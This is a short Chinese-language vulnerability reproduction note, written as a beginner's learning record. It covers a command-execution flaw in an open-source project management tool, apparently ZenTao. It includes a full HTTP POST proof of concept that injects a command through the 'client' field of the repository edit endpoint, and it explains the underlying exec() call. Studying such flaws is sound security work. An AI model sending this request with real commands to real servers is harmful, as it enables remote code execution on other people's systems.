某开源项目管理软件 命令执行漏洞复现

某开源项目管理软件 命令执行漏洞复现

限制

m=repo&f=edit&repoID=4&objectID=0
SCM=Subversion&client=命令

复现

先在Devops创建代码库

SCM类型改为Subversion，client=calc

POST /www/index.php?m=repo&f=edit&repoID=4&objectID=0 HTTP/1.1
Host: zentao.com
Content-Length: 159
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://zentao.com
Referer: http://zentao.com/www/index.php?m=repo&f=edit&repoID=4&objectID=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-cn; device=desktop; theme=default; zentaosid=cii1u3b5r641gjrf8n2f8nkdbv; repoBranch=master; preProductID=1; preBranch=0; goback=%7B%22devops%22%3A%22http%3A%5C%2F%5C%2Fzentao.com%5C%2Fwww%5C%2Findex.php%3Fm%3Drepo%26f%3Dbrowse%22%7D; tab=devops; windowWidth=1201; windowHeight=883
Connection: close
product%5B%5D=1&projects%5B%5D=7&SCM=Subversion&serviceHost=&name=zz&path=&encoding=utf-8&client=calc&account=&password=&encrypt=base64&desc=&uid=64afe826d96f7

代码
checkConnection

这里要以post方式提交下面的变量，$scm=Subversion才会进入if,$client为可控变量，是要执行的命令，来获取程序的版本信息。
exec() 函数的第一个参数是要执行的命令字符串，第二个参数是一个数组，用于存储命令执行的结果；第三个参数是一个整数，用于指定返回值的状态码

新手入门作为学习记录，写的不太完美还请见谅！